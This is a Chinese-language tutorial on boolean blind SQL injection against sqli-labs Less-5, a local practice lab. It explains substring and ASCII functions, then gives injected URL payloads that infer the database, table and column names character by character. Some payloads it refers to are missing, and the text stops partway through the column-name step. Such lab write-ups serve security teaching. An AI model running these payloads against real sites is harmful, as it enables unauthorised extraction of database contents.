如果所查詢的使用者id在資料庫中，可以發現頁面顯示”You are in”，而不像前4關那樣會顯示出具體的賬號密碼

而如果輸入的查詢語句不存在，則什麼也不會返回

這裡普及一下盲注時的常用函式
1.mid()函式

mid(striing,start,length)

string(必需)規定要返回其中一部分的字串。

start(必需)規定開始位置（起始值是 1）。

length(可選)要返回的字元數。如果省略，則 mid() 函式返回剩餘文字。

2.substr()函式

substr(string,start,length)

string(必需)規定要返回其中一部分的字串。

start(必需)規定在字串的何處開始。

length(可選)規定被返回字串的長度。

3.left()函式

left(string,length)

再怎麼解釋也不如直接開弄

string(必需)規定要返回其中一部分的字串

length（可選）規定被返回字串的前length長度的字元

4.ascii(a)將a轉換成其ASCII值
5.ord(a)將a轉換成其ASCII值

首先猜解庫名
我們這裡先用length測出資料庫的長度是8

接著，利用substr函式，推測庫名的第一個字元
大於r

小於t

由此可推斷第一個字元是s
接下來判斷第二個字元：
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),2)>'sd'%23

‘sd’<’當前資料庫名的前兩位字元’<’sf’

所以當前資料庫名的第二位字元為’e’。

以此類推，最後得到當前資料庫名為“security”

第二步當然是推表名
因為有多個表，所以我們在這一步還是需要用到limit，以便一個個推測
還是一樣，先測第一個表的長度

使用上面這個payload，如果頁面返回”You are in”，則表示第一張表的長度至少為1，同樣的，我們可以對 limit num,1),num,1)) num部分進行遞增判斷，如果進行到 limit 0,1),7,1)) 時頁面返回空，則說明第一張表的長度為7-1=6

這裡呢，我們只用substr就會不方便了，因為表名只要包含到數字或者像@這樣的識別符號，用字元一個夾逼就不是很方便，所以這裡用acsii碼來比對，這樣範圍更好確定

下一步當然就是要查列名了
還是先查詢列的數量猜解列的個數
http://127.0.0.1/sqlilabs/Less-5/?id=1' and %d=(select count(column_name) from information_schema.columns where table_name='users')%23然
後一步步夾逼出列名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name="users" limit 4,1),1,1))>104%23
h<第五個列的第一個字元